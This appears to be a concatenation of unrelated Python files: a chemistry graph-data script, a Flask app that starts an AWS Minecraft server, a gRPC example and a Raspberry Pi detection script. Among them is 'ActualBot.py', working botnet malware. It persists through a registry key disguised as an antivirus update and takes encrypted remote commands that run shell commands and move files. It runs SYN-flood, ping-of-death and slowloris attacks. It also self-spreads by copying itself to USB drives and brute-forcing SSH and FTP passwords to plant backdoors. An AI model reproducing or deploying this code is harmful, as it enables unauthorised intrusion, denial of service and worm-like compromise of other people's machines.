#cluster = loadStructure(saveFolder +'/'+ file)
stru_dim = "3D"
NFM = np.zeros((numb_nodes,numb_nodeF)) + deadVal
ele_min = 99
ele_max = 0
for i, cords in enumerate(cluster):
atompos = np.array([cluster[i].x, cluster[i].y, cluster[i].z])
ele_sym = cluster.element[i]
atomnumber = element(ele_sym).atomic_number
if atomnumber > ele_max:
ele_max = atomnumber
if ele_min > atomnumber:
ele_min = atomnumber
NFM[i][0] = atomnumber
for j, sat in enumerate(satellites):
NFM[i][j+1] = np.linalg.norm(atompos - sat)
NFM_graphData = NFM.copy()
NFM = NFM.T
NFM = NFM[1:]
dist_min = np.min(NFM[NFM != deadVal])
dist_max = np.max(NFM[NFM != deadVal])
# Edge features
G = nx.Graph() # create an empty graph with no nodes and no edges
G.add_nodes_from(range(numb_nodes)) # add a list of nodes
dist_list = []
index = []
for i in range(len(cluster)):
atom_neighbors_1 = bc.getNeighborSites(i)
ph_index = []
for j in range(i+1,len(cluster)):
position_0 = cluster.x[i], cluster.y[i], cluster.z[i]
position_1 = cluster.x[j], cluster.y[j], cluster.z[j]
new_dist = distance(position_0, position_1)
dist_list.append(new_dist)
ph_index.append([i,j])
G.add_edges_from([(i, j, {'Distance': new_dist})])
index.append(ph_index)
dist_list = np.array(dist_list)
dist_min2 = np.min(dist_list)
dist_max2 = np.max(dist_list)
Edge_feature_matrix = np.zeros([1, len(G.edges)]) # This should be dynamic
for count, edge in enumerate(G.edges):
Edge_feature_matrix[:][0][count] = nx.get_edge_attributes(G, "Distance")[edge]
edge_list = []
for edge in G.edges:
edge_list.append([edge[0], edge[1]])
Edge_array = np.asarray(edge_list).T
graphData = dict(NFM=NFM_graphData, EFM=Edge_feature_matrix.T, EAR=Edge_array)
hf_graphData = h5py.File(saveFolder +'/'+ str(file[0:-4]) + '.h5', 'w')
for dict_label, dict_Data in graphData.items():
hf_graphData.create_dataset(dict_label, data=dict_Data)
hf_graphData.close()
renorm_dict.update({'{}'.format(file) : {'Node dist min' : dist_min,'Node dist max' : dist_max,
'Edge dist min' : dist_min2, 'Edge dist max' : dist_max2,
'Atom min' : ele_min, 'Atom max' : ele_max,
'Structure dim' : stru_dim}})
pbar.update(1)
pbar.close()
df = pd.DataFrame.from_dict(renorm_dict, orient="index")
return_dict[label] = df
return None
def normFeatures(x, min_val, max_val):
return (x-min_val)/(max_val-min_val)
def distance(position_0, position_1):
""" Returns the distance between vectors position_0 and position_1 """
return np.sqrt((position_0[0] - position_1[0]) ** 2 + (position_0[1] - position_1[1]) ** 2 + (
position_0[2] - position_1[2]) ** 2)
def dist_check(cluster, bc, overlap = 0.7):
for idx1 in range(len(cluster)):
for idx2 in range(idx1 + 1, len(cluster)):
pos1 = np.array([cluster[idx1].x, cluster[idx1].y, cluster[idx1].z])
pos2 = np.array([cluster[idx2].x, cluster[idx2].y, cluster[idx2].z])
dist1 = distance(pos1, pos2)
dist2 = bc.atomradiitable.lookup(cluster.element[idx1]) + bc.atomradiitable.lookup(cluster.element[idx2])
if dist2 * overlap > dist1:
return False
return True
def getMinMaxDist(cluster):
minDist = 99
maxDist = 0
for idx1 in range(len(cluster)):
for idx2 in range(idx1 + 1, len(cluster)):
pos1 = np.array([cluster[idx1].x, cluster[idx1].y, cluster[idx1].z])
pos2 = np.array([cluster[idx2].x, cluster[idx2].y, cluster[idx2].z])
dist1 = distance(pos1, pos2)
if dist1 > maxDist:
maxDist = dist1
elif minDist > dist1:
minDist = dist1
return minDist, maxDist
def structure_check(files, folder, folder_save):
ph = files.copy()
bc = OverlapCalculator()
bc.atomradiitable = 'covalent'
distance_list = []
fails = []
print('\nGetting min and max for atomnumber:')
distList = []
pbar = tqdm(total=len(files))
for count, file in enumerate(files):
try:
cluster = loadStructure(folder + '/' + file)
dpc = DebyePDFCalculator()
_, _ = dpc(cluster)
bc(cluster)
except:
ph.remove(file)
fails.append(file)
pbar.update(1)
continue
if len(cluster) < minimum_atoms or len(cluster) > maximum_atoms:
ph.remove(file)
pbar.update(1)
continue
minDist, maxDist = getMinMaxDist(cluster)
distList.append([minDist, maxDist])
if not os.path.isfile(folder_save+'/'+file):
copyfile(folder+'/'+file,folder_save+'/'+file)
pbar.update(1)
pbar.close()
distList = np.array(distList)
maxmax = np.amax(distList)
minmin = np.amin(distList)
if fails != []:
print('Following files failed loading:')
for file in fails:
print(file)
else:
print('No files failed loading')
print ("MinDist found to: ", minmin)
print ("MaxDist found to: ", maxmax)
return ph, minmin, maxmax
def move_structures(enliste, folder):
for file in enliste:
cluster = loadStructure(folder + '/' + file)
#if cluster.x.mean() != 0 or cluster.y.mean() != 0 or cluster.z.mean() != 0:
cluster.x = cluster.x - cluster.x.mean()
cluster.y = cluster.y - cluster.y.mean()
cluster.z = cluster.z - cluster.z.mean()
cluster.write(folder + '/' + file, format="xyz")
return
if __name__ == '__main__':
global root # Root folder for script
global folder # Folder where xyz are fetched
global saveFolder # Where the graphs will be saved
global deadVal # Value assigned dummy nodes
global numb_nodes # Maximum number of nodes in graph, numb_nodes = maximum_atoms
global numb_nodeF # Node features: atom number plus the distance to each satellite
global minimum_atoms # Smallest structural motif
global maximum_atoms # Largest structural motif, numb_nodes = maximum_atoms
numb_lists = 8 # The number of threads generated
numSats = 11
satellites = sampleSphere(numSats)
index = ['Satellite{}'.format(i) for i in range(np.shape(satellites)[0])]
# Define values
deadVal = -1
numb_nodes = 200
numb_nodeF = 1+np.shape(satellites)[0]
minimum_atoms = 4
maximum_atoms = numb_nodes
# Placeholders
atom_min = 99
atom_max = 0
# Get files
root = os.getcwd()
folder = '/mnt/c/Users/Nanostructure/Downloads/CVAE/makeData/XYZ_200atoms/'
enliste = sorted(os.listdir(folder))
enliste = [file for file in enliste if file[0] != '.' and file[-4:] == '.xyz']
saveFolder = '/mnt/c/Users/Nanostructure/Downloads/CVAE/makeData/Graphs_200atoms/'
satPath = '/mnt/c/Users/Nanostructure/Downloads/CVAE/makeData/'
shall_we_check_structures = True
np.random.shuffle(enliste)
#enliste = enliste[:10]
if shall_we_check_structures:
enliste, minDist, maxDist = structure_check(enliste, folder, saveFolder)
minDist = 0
move_structures(enliste, folder) # Centre each structure on the origin
satellites *= 0.5*maxDist # Half of the longest distance
start_time = time.time()
print(np.shape(satellites))
df = pd.DataFrame(satellites, index=[index],
columns=['x','y','z'])
df.to_csv(satPath+'/normvaluesSatellitePositions_{}minDist_{}maxDist_200atoms_Qmin0p8_Qmax26_ADP0p3.csv'.format(minDist, maxDist))
print('\n{} xyz files matched search criteria'.format(len(enliste)))
idx = math.ceil(len(enliste)/numb_lists)
list_of_slices = []
for i in range(numb_lists):
list_of_slices.append(enliste[i*idx:(1+i)*idx])
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for label, i in enumerate(list_of_slices):
p = multiprocessing.Process(target=create_graphs, args=(i, label, saveFolder, satellites, numb_nodes, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
print('\nCreating renorm csv')
for i, dicts in enumerate(return_dict.values()):
if i == 0:
df = dicts
else:
df = pd.concat([dicts,df])
df.to_csv(satPath+'/normvaluesSatelliteDistances_200atoms_Qmin0p8_Qmax26_ADP0p3.csv')
print('Took {:.2f} min'.format((time.time() - start_time)/60))
print("Normalising all the data, saving it as h5py ready for fast loading, and splitting the data into training/test sets.")
graphData, atomRange, allFiles = makeData(data_path=saveFolder,
xyzPath=saveFolder,
norm=satPath+'/normvaluesSatelliteDistances_200atoms_Qmin0p8_Qmax26_ADP0p3.csv',
nFiles=len(enliste),
nNodes=numb_nodes,
loadPDF=False, # Either generates or reads PDFs
test_set_ratio = 0.2,
deadVal = deadVal,
maxDist = maxDist)
|
server.py
|
from flask import Flask, render_template, request, jsonify
from flask_cors import CORS, cross_origin
from multiprocessing import Process
import json
import boto3
import time
import paramiko
import os
import io
import warnings
app = Flask(__name__)
CORS(app)
SERVER_NAME = os.getenv('SERVER_NAME', 'On Demand Minecraft Server')
# If there is a server address, display this publicly in the template instead of returning the IP on start
SERVER_ADDRESS = os.getenv('SERVER_ADDRESS')
# Stop paramiko from clogging the log output with deprecation warnings
warnings.filterwarnings(action='ignore', module='.*paramiko.*')
# Paramiko ssh information
key_string = os.getenv('SSH_KEY').replace('\\n', '\n')
key = paramiko.RSAKey.from_private_key(io.StringIO(key_string))
sshClient = paramiko.SSHClient()
sshClient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def serverWaitOk(client, instanceIp, instanceId):
"""Waits for the server to reach a valid state so that commands can be executed on the server"""
checksPassed = False
status = 'initializing'
instanceIds = [instanceId]
print('Waiting for instance', instanceId,
'to have status ok', flush=True)
while (not checksPassed) and (status == 'initializing'):
statusCheckResponse = client.describe_instance_status(
InstanceIds=instanceIds)
instanceStatuses = statusCheckResponse['InstanceStatuses']
instanceStatus = instanceStatuses[0]
instanceStatus = instanceStatus['InstanceStatus']
status = instanceStatus['Status']
checksPassed = status == 'ok'
print('Instance', instanceId, 'status is', status, flush=True)
time.sleep(5)
if checksPassed:
initServerCommands(instanceIp)
else:
print('An error has occurred booting the server', flush=True)
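# Note (alternative sketch, not used above): boto3 ships a built-in waiter that polls the same
# DescribeInstanceStatus API until the instance passes its status checks, which could replace
# the manual loop:
#   waiter = client.get_waiter('instance_status_ok')
#   waiter.wait(InstanceIds=[instanceId])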
def initServerCommands(instanceIp):
"""SSH connects to server and executes command to boot minecraft server"""
# Connect/ssh to an instance
try:
# Here 'ubuntu' is user name and 'instance_ip' is public IP of EC2
sshClient.connect(hostname=instanceIp, username="ubuntu", pkey=key)
# Execute a command(cmd) after connecting/ssh to an instance
stdin, stdout, stderr = sshClient.exec_command(
"screen -dmS minecraft bash -c 'java " + os.getenv('MEMORY_ALLOCATION', '') + " -jar server.jar nogui'") #-Xmx2G -XX:MaxMetaspaceSize=256M
print('Starting minecraft', flush=True)
# close the client connection once the job is done
sshClient.close()
except Exception as err:
print('Error running server commands:')
print(err, flush=True)
def render_index(**vargs):
return render_template('index.html', serverName=SERVER_NAME, serverAddress=SERVER_ADDRESS, **vargs)
@app.route('/')
def loadIndex():
"""Main endpoint for loading the webpage"""
return render_index()
@app.route('/initServerMC', methods=['POST'])
def initServerMC():
inputPass = request.form['pass']
message = "Password Incorrect!"
if inputPass == os.getenv('SERVER_PASSWORD'):
print('IP', request.remote_addr,
'has supplied correct password', flush=True)
# Instantiate server here or return ip address if already running
client = boto3.client(
'ec2',
aws_access_key_id=os.getenv('ACCESS_KEY'),
aws_secret_access_key=os.getenv('SECRET_KEY'),
region_name=os.getenv('EC2_REGION')
)
message = manageServer(client)
else:
print('IP', request.remote_addr,
'gave wrong password \'{}\''.format(inputPass), flush=True)
return render_index(ipMessage=message)
def manageServer(client):
"""Gets IP Address for return to webpage otherwise boots server"""
returnString = 'ERROR'
instanceIds = [os.getenv('INSTANCE_ID')]
response = client.describe_instances(InstanceIds=instanceIds)
reservations = response['Reservations']
reservation = reservations[0]
instances = reservation['Instances']
if len(instances) > 0:
instance = instances[0]
print('Found instance with id', instance['InstanceId'], flush=True)
state = instance['State']
stateName = state['Name']
if (stateName == 'stopped') or (stateName == 'shutting-down'):
returnString = startServer(client, instance['InstanceId'])
elif stateName == 'running':
ipAddress = instance['PublicIpAddress']
if SERVER_ADDRESS:
returnString = 'Server is up and running!'
else:
returnString = 'Server is up and running with IP {}'.format(ipAddress)
else:
print('Instance state \'{}\' is unrecognized'.format(
stateName), flush=True)
returnString = 'Server is in an unrecognized state, please try again in a few minutes'
return returnString
def startServer(client, instanceId):
"""Starts the specified AWS Instance from the configuration"""
# Gets proper variables to attempt to instantiate EC2 instance and start minecraft server
returnString = 'ERROR'
instanceIds = [instanceId]
response = client.start_instances(InstanceIds=instanceIds)
print('AWS EC2 START RESPONSE\n')
print(response)
print('\n', flush=True)
stateCode = 0
while not (stateCode == 16):
print('Waiting for instance', instanceId, 'to start', flush=True)
time.sleep(3)
response = client.describe_instances(InstanceIds=instanceIds)
reservations = response['Reservations']
reservation = reservations[0]
instances = reservation['Instances']
instance = instances[0]
state = instance['State']
stateCode = state['Code']
ipAddress = instance['PublicIpAddress']
if SERVER_ADDRESS:
returnString = 'Server is starting, this may take a few minutes... Remember to hit refresh in Minecraft!'
else:
returnString = 'Server is starting, it may take a few minutes. Server IP: {}'.format(ipAddress)
# SETUP MULTIPROCESSING HERE INSTEAD OF REDIS
p = Process(target=serverWaitOk, args=(client, ipAddress, instanceId))
p.start()
return returnString
if __name__ == "__main__":
app.run()
|
ActualBot.py
|
import os
import time
import base64
import shutil
import socket
import random
import ftplib
import paramiko
import win32api
import platform
import win32con
import win32gui
import threading
import win32file
import subprocess
import win32console
from Queue import Queue
from Crypto.Cipher import XOR, AES
from Crypto.Hash import SHA256
from __assets__ import Lo0sR, Bully
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
path_to_files = "C:/Users/" + win32api.GetUserName() + "/Documents/Windows Defender/"
NUMBER_OF_THREADS = 4
JOB_NUMBER = [1, 2, 3, 4, ]
queue = Queue()
common_ports = [21, 22]
passwords = []
events = []
ddos_events = []
connected = False
net_devices = []
class Startup:
def __init__(self):
self.user = win32api.GetUserName() # Username
self.reg_exist = True
def hide(self):
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
def add_to_registry(self): # add to startup registry
hkey = win32api.RegCreateKey(win32con.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run")
win32api.RegSetValueEx(hkey, 'Anti-Virus Update', 0, win32con.REG_SZ, __file__)
win32api.RegCloseKey(hkey)
def add_to_startup(self):
path = 'C:\\Users\\' + self.user + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'
if os.path.isfile(path + __file__.split("")) == True:
pass
else:
shutil.copy(__file__, path)
def make_dirs(self):
if not os.path.exists(path_to_files + "downloads"):
os.mkdir(path_to_files + "downloads")
def run(self):
self.hide()
self.make_dirs()
#self.add_to_startup() # Choose startup or registry (both start on boot)
self.add_to_registry()
class EncryptionHandler:
def __init__(self):
self.pswd = "\x1f\xbf\x9fV\x1c'\xe7\xbf\xddo\x1e@@\xe7l\xce\xed\xc0\x12\xd4\xed\xdbNZ!\xd9\xb3\x81|\xa4\xe7"
self.padding = "{"
def _key(self):
key = SHA256.new(self.pswd)
key = key.digest()
return key
def _pad(self, data):
length = len(data)
to_pad = 0
while length % 16:
to_pad += 1
length += 1
return data + (self.padding * to_pad)
def _unpad(self, data):
data = data.strip(self.padding)
return data
def encrypt(self, data):
print str(data)
cipher = AES.new(self._key(), AES.MODE_CTR, counter=lambda: self._key()[:16])
data = self._pad(data)
data = cipher.encrypt(data)
cipher = XOR.new(self._key())
data = cipher.encrypt(data)
data = base64.b64encode(data)
return data
def decrypt(self, data):
cipher = XOR.new(self._key())
data = base64.b64decode(data)
data = cipher.decrypt(data)
cipher = AES.new(self._key(), AES.MODE_CTR, counter=lambda: self._key()[:16])
data = cipher.decrypt(data)
data = self._unpad(data)
return data
class DenialOfService:
def ping_of_death(self, target):
from scapy.all import IP, ICMP, send
src = "%i.%i.%i.%i" % (
random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
ip_hdr = IP(src, target)
_packet = ip_hdr / ICMP() / (str(os.urandom(65500)))
send(_packet)
def syn_flood(self, target, port):
from scapy.all import IP, TCP, send
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65500)
t.dport = port
t.flags = 'S'
send(i / t, verbose=0)
def slow_loris(self, target):
Bully.Bully(target)
class FileHandler:
def upload(self, filename):
time.sleep(0.5)
if os.path.isfile(filename):
with open(filename, 'rb') as f:
bytesToSend = f.read(1024)
Bot().send(bytesToSend)
while bytesToSend:
bytesToSend = f.read(1024)
Bot().send(bytesToSend)
Bot().send("EOF")
def download(self, filename):
data = Bot().receive()
f = open('new_' + filename, 'wb')
f.write(data)
while data:
data = Bot().receive()
if data == "EOF":
break
else:
f.write(data)
print "Download Complete!"
f.close()
class Spread:
def load_passwords(self):
global passwords
with open("__assets__/passwords.txt", "r") as f:
for pswd in f.readlines():
time.sleep(0.1)
passwords.append(pswd.strip("\n"))
return None
def locate_usb(self):
drive_list = []
drivebits = win32file.GetLogicalDrives()
for d in range(1, 26):
mask = 1 << d
if drivebits & mask:
drname = '%c:\\' % chr(ord('A') + d)
t = win32file.GetDriveType(drname)
if t == win32file.DRIVE_REMOVABLE:
drive_list.append(drname)
return drive_list
def hijack_usb(self):
while True:
for usb in self.locate_usb():
if usb:
for file in os.listdir("."):
shutil.copy(file, usb)
time.sleep(120)
def get_gateway(self):
p = sr1(IP(dst="www.google.com", ttl=0) / ICMP() / "X", verbose=0)
return p.src
def scan_lan(self):
global net_devices
time.sleep(0.5)
base_ip = self.get_gateway()
base_ip = base_ip.split('.')
base_ip = "%s.%s.%s." % (base_ip[0], base_ip[1], base_ip[2])
for ip in range(1, 255):
ip = str(base_ip) + str(ip)
for port in common_ports:
print ip
if port == 22:
ThreadHandler().add_to_threads(Spread().brute_ssh, args=str(ip))
else:
ThreadHandler().add_to_threads(Spread().brute_ftp, args=str(ip))
return None
def brute_ftp(self, host):
global passwords
for pswd in passwords:
try:
ftp = ftplib.FTP(host)
ftp.login("root", pswd)
ftp.storlines("STOR %s" % "index.php", open("some_infected_php_file.php", "r")) # Change to actual php backdoor (You can use Weevely to generate a backdoor)
ftp.quit()
except Exception:
pass
return None
def brute_ssh(self, host):
global passwords
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for pswd in passwords:
try:
ssh.connect(host, port=22, username="root", password=pswd)
sftp = ssh.open_sftp()
ssh.exec_command("cd ..")
ssh.exec_command("mkdir .etc")
ssh.exec_command("cd .etc")
for file in os.listdir("SSH_files_linux"):
sftp.put(file, ".etc")
sftp.close()
ssh.exec_command("chmod +x ActualBot.py")
ssh.exec_command("./ActualBot.py")
ssh.close()
except paramiko.AuthenticationException:
pass
except socket.error:
pass
return None
def run(self):
ThreadHandler().add_to_threads(target=self.load_passwords, args=None)
ThreadHandler().add_to_threads(target=self.scan_lan, args=None)
ThreadHandler().add_to_threads(target=self.hijack_usb, args=None)
class Bot:
def __init__(self):
self.ip = '' # IP of Host that the server is running on
self.port = 44353 # Host's port
def connect(self):
global connected
while connected == False:
time.sleep(1)
try:
s.connect((self.ip, self.port))
except socket.error:
pass
finally:
connected = True
def send(self, data):
global connected
data = EncryptionHandler().encrypt(data)
try:
s.send(str(data))
except socket.error as e:
print e
time.sleep(2.5)
connected = False
def receive(self):
global s
global connected
try:
data = s.recv(1368)
if data:
return EncryptionHandler().decrypt(data)
if not data:
s = socket.socket()
if connected != False:
connected = False
self.connect()
except socket.error as e:
print e
s = socket.socket()
if connected != False:
connected = False
self.connect()
def exec_command(self, command):
command = command.split(' ')
if command[0] == 'cd':
os.chdir(command[1])
self.send(os.getcwd())
elif command[0] == 'info':
info = platform.uname()
self.send('OS: %s\nHost Name: %s' % (info[0], info[1]))
elif command[0] == 'exit':
s.close()
self.connect()
elif command[0] == ('start' or 'Start'):
data = ' '.join(command)
cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
elif command[0] == "upload":
FileHandler().download(command[1])
elif command[0] == "download":
FileHandler().upload(command[1])
elif command[0] == 'DDoS':
if command[1]:
if command[2]:
if command[1] == 'pod':
thread_id = ThreadHandler().add_to_threads(DenialOfService().ping_of_death, command[2])
ddos_events.append(thread_id)
self.send('Started DoS!')
if command[1] == "sl":
thread_id = ThreadHandler().add_to_threads(DenialOfService().slow_loris, command[2])
ddos_events.append(thread_id)
self.send('Started DoS!')
if command[1] == "syn":
thread_id = ThreadHandler().add_to_threads(DenialOfService().syn_flood, command[2])
ddos_events.append(thread_id)
self.send('Started DoS!')
if command[1] == 'stop':
ThreadHandler().stop(ddos_events[0])
self.send('Stopped DoS!')
else:
self.send("[!]You need to specify a target!")
else:
self.send("[!]You need to specify an attack type!")
else:
data = ' '.join(command)
cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = cmd.stdout.read() + cmd.stderr.read()
if len(output) > 65520:
self.send("[!]Too large!")
else:
self.send(output)
def handler(self):
while True:
data = self.receive()
if data:
data.split(' ')
if data[0] == 'ok?':
self.send('ok!')
if data[0] == 'download':
print data[1]
if len(data[1]) > 0:
FileHandler().upload(data[1])
if data[0] == 'upload':
print data[1]
if len(data[1]) > 0:
FileHandler().download(data[1])
else:
self.exec_command(data)
def run(self):
self.connect()
self.handler()
class ThreadHandler:
def stop(self, event_id):
event = events[event_id]
event.set()
def add_to_threads(self, target, args):
global events
event = threading.Event()
events.append(event)
if args:
t = threading.Thread(target=target, args=args)
t.daemon = True
t.start()
else:
t = threading.Thread(target=target)
t.daemon = True
t.start()
thread_id = events.index(event)
return thread_id
def create_workers(self):
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=self.work)
t.daemon = True
t.start()
def work(self):
while True:
x = queue.get()
if x == 1:
Startup().run()
if x == 2:
Bot().run()
if x == 3:
Spread().run()
if x == 4:
Lo0sR.ThreadHandler().run()
queue.task_done()
def create_jobs(self):
for x in JOB_NUMBER:
queue.put(x)
queue.join()
def run(self):
self.create_workers()
self.create_jobs()
if __name__ == '__main__':
ThreadHandler().run()
|
wait_for_ready_example.py
|
# Copyright 2019 The gRPC Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Python example of utilizing wait-for-ready flag."""
from __future__ import print_function
import logging
from concurrent import futures
from contextlib import contextmanager
import socket
import threading
import grpc
from examples import helloworld_pb2
from examples import helloworld_pb2_grpc
_LOGGER = logging.getLogger(__name__)
_LOGGER.setLevel(logging.INFO)
@contextmanager
def get_free_loopback_tcp_port():
if socket.has_ipv6:
tcp_socket = socket.socket(socket.AF_INET6)
else:
tcp_socket = socket.socket(socket.AF_INET)
tcp_socket.bind(('', 0))
address_tuple = tcp_socket.getsockname()
yield "localhost:%s" % (address_tuple[1])
tcp_socket.close()
class Greeter(helloworld_pb2_grpc.GreeterServicer):
def SayHello(self, request, unused_context):
return helloworld_pb2.HelloReply(message='Hello, %s!' % request.name)
def create_server(server_address):
server = grpc.server(futures.ThreadPoolExecutor())
helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)
bound_port = server.add_insecure_port(server_address)
assert bound_port == int(server_address.split(':')[-1])
return server
def process(stub, wait_for_ready=None):
try:
response = stub.SayHello(
helloworld_pb2.HelloRequest(name='you'),
wait_for_ready=wait_for_ready)
message = response.message
except grpc.RpcError as rpc_error:
assert rpc_error.code() == grpc.StatusCode.UNAVAILABLE
assert not wait_for_ready
message = rpc_error
else:
assert wait_for_ready
_LOGGER.info("Wait-for-ready %s, client received: %s", "enabled"
if wait_for_ready else "disabled", message)
def main():
# Pick a random free port
with get_free_loopback_tcp_port() as server_address:
# Register connectivity event to notify main thread
transient_failure_event = threading.Event()
def wait_for_transient_failure(channel_connectivity):
if channel_connectivity == grpc.ChannelConnectivity.TRANSIENT_FAILURE:
transient_failure_event.set()
# Create gRPC channel
channel = grpc.insecure_channel(server_address)
channel.subscribe(wait_for_transient_failure)
stub = helloworld_pb2_grpc.GreeterStub(channel)
# Fire an RPC without wait_for_ready
thread_disabled_wait_for_ready = threading.Thread(
target=process, args=(stub, False))
thread_disabled_wait_for_ready.start()
# Fire an RPC with wait_for_ready
thread_enabled_wait_for_ready = threading.Thread(
target=process, args=(stub, True))
thread_enabled_wait_for_ready.start()
# Wait for the channel entering TRANSIENT FAILURE state.
transient_failure_event.wait()
server = create_server(server_address)
server.start()
# Expected to fail with StatusCode.UNAVAILABLE.
thread_disabled_wait_for_ready.join()
        # Expected to succeed.
thread_enabled_wait_for_ready.join()
server.stop(None)
channel.close()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
|
object_detect.py
|
#python3 main.py --bin ssd_mobilenet/MobileNetSSD_deploy.bin --xml ssd_mobilenet/MobileNetSSD_deploy.xml --labels ssd_mobilenet/labels.txt --conf_threshold=0.4
#python3 main.py --bin ssd_resnet50/saved_model.bin --xml ssd_resnet50/saved_model.xml --labels ssd_resnet50/labels.txt --conf_threshold=0.1
#python3 main.py --xml ssd_mobilenet/ssd_resnet50/openvino/saved_model.xml --bin ssd_mobilenet/ssd_resnet50/openvino/saved_model.bin --labels ssd_mobilenet/labels.txt
#################################################
# Original script could be found on #
# https://github.com/leswright1977/RPI4_NCS2 #
# Put this script into 'RPI4_NCS2/src' #
#################################################
import cv2
import time
import numpy
from multiprocessing import Process
from multiprocessing import Queue
from picamera.array import PiRGBArray
from picamera import PiCamera
from sys import getsizeof
#hacked from:
#https://software.intel.com/articles/OpenVINO-Install-RaspberryPI
#https://opencv2-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html
#https://github.com/PINTO0309/MobileNet-SSD-RealSense/blob/master/SingleStickSSDwithUSBCamera_OpenVINO_NCS2.py
#https://raspberrypi.stackexchange.com/questions/87062/overhead-counter
#Les Wright Dec 24 2018 (modified to support picam 30 Dec 2018)
#refined to warp speed (30 fps video, 28 fps inferencing 20 Feb 2019)
#Note: for cv2.dnn.blobFromImage the input size is present in the XML files; we could write a preamble to go get that data,
#so we don't have to set it explicitly (a sketch of such a preamble follows below).
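# --- Sketch of the preamble suggested above (not part of the original script) ---
# Read the expected input size from the OpenVINO IR .xml instead of hard-coding
# 300x300. This assumes the input layer is stored with type "Input" (or "Parameter")
# and NCHW dims, which is the usual IR layout; adjust for your model if it differs.
import xml.etree.ElementTree as ET

def get_input_hw(xml_path, default=(300, 300)):
    """Return (height, width) of the first Input/Parameter layer in an IR .xml."""
    try:
        root = ET.parse(xml_path).getroot()
        for layer in root.iter('layer'):
            if layer.get('type') in ('Input', 'Parameter'):
                dims = [int(d.text) for d in layer.iter('dim')]
                if len(dims) >= 4:  # dims are [N, C, H, W]
                    return dims[2], dims[3]
    except (ET.ParseError, OSError):
        pass
    return default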
confThreshold = 0.4
# Load model
net = cv2.dnn.readNet('ssd_mobilenet/bosch_model_0/saved_model.xml', 'ssd_mobilenet/bosch_model_0/saved_model.bin')
# Specify target device
net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)
labels_file = 'labels.txt'
with open(labels_file, 'r') as f:
labels = [x.strip() for x in f]
print(labels)
#define the function that handles our processing thread
def classify_frame(net, inputQueue, outputQueue):
# keep looping
while True:
# check to see if there is a frame in our input queue
if not inputQueue.empty():
# grab the frame from the input queue, resize it, and
# construct a blob from it
frame = inputQueue.get()
resframe = cv2.resize(frame, (300, 300))
blob = cv2.dnn.blobFromImage(resframe, 1, size=(300, 300), mean=(127.5,127.5,127.5), swapRB=False, crop=False)
net.setInput(blob)
out = net.forward()
data_out = []
for detection in out.reshape(-1, 7):
inference = []
obj_type = int(detection[1]-1)
confidence = float(detection[2])
xmin = int(detection[3] * frame.shape[1])
ymin = int(detection[4] * frame.shape[0])
xmax = int(detection[5] * frame.shape[1])
ymax = int(detection[6] * frame.shape[0])
if confidence > 0: #ignore garbage
inference.extend((obj_type,confidence,xmin,ymin,xmax,ymax))
data_out.append(inference)
outputQueue.put(data_out)
# initialize the input queue (frames), output queue (out),
# and the list of actual detections returned by the child process
inputQueue = Queue(maxsize=1)
outputQueue = Queue(maxsize=1)
out = None
# construct a child process *independent* from our main process of
# execution
print("[INFO] starting process...")
p = Process(target=classify_frame, args=(net,inputQueue,outputQueue,))
p.daemon = True
p.start()
print("[INFO] starting capture...")
# Initialise the PiCamera and the raw capture stream used in the loop below.
# NOTE: these definitions were missing from this copy of the script; the resolution,
# framerate and counters are assumptions based on the original RPI4_NCS2 source.
frameWidth = 304
frameHeight = 304
camera = PiCamera()
camera.resolution = (frameWidth, frameHeight)
camera.framerate = 35
rawCapture = PiRGBArray(camera, size=(frameWidth, frameHeight))
font = cv2.FONT_HERSHEY_SIMPLEX
detections = 0  # running count of positive detections
fps = 0.0       # video frame rate
qfps = 0.0      # inference (queue pull) rate
#time the frame rate....
timer1 = time.time()
frames = 0
queuepulls = 0
timer2 = 0
t2secs = 0
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
if queuepulls ==1:
timer2 = time.time()
# Capture frame-by-frame
frame = frame.array
# if the input queue *is* empty, give the current frame to
# classify
if inputQueue.empty():
inputQueue.put(frame)
# if the output queue *is not* empty, grab the detections
if not outputQueue.empty():
out = outputQueue.get()
queuepulls += 1
#print(len(out))
#print(getsizeof(out))
# check to see if 'out' is not empty
if out is not None:
# loop over the detections
for detection in out:
#print(detection)
#print("\n")
objID = detection[0]
confidence = detection[1]
xmin = detection[2]
ymin = detection[3]
xmax = detection[4]
ymax = detection[5]
if confidence > confThreshold:
#bounding box
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 255))
#label
cv2.rectangle(frame, (xmin-1, ymin-1),\
(xmin+70, ymin-10), (0,255,255), -1)
#labeltext
cv2.putText(frame,' '+labels[objID]+' '+str(round(confidence,2)),\
(xmin,ymin-2), font, 0.3,(0,0,0),1,cv2.LINE_AA)
detections +=1 #positive detections
# Display the resulting frame
cv2.rectangle(frame, (0, 0),\
(90, 15), (0,0,0), -1)
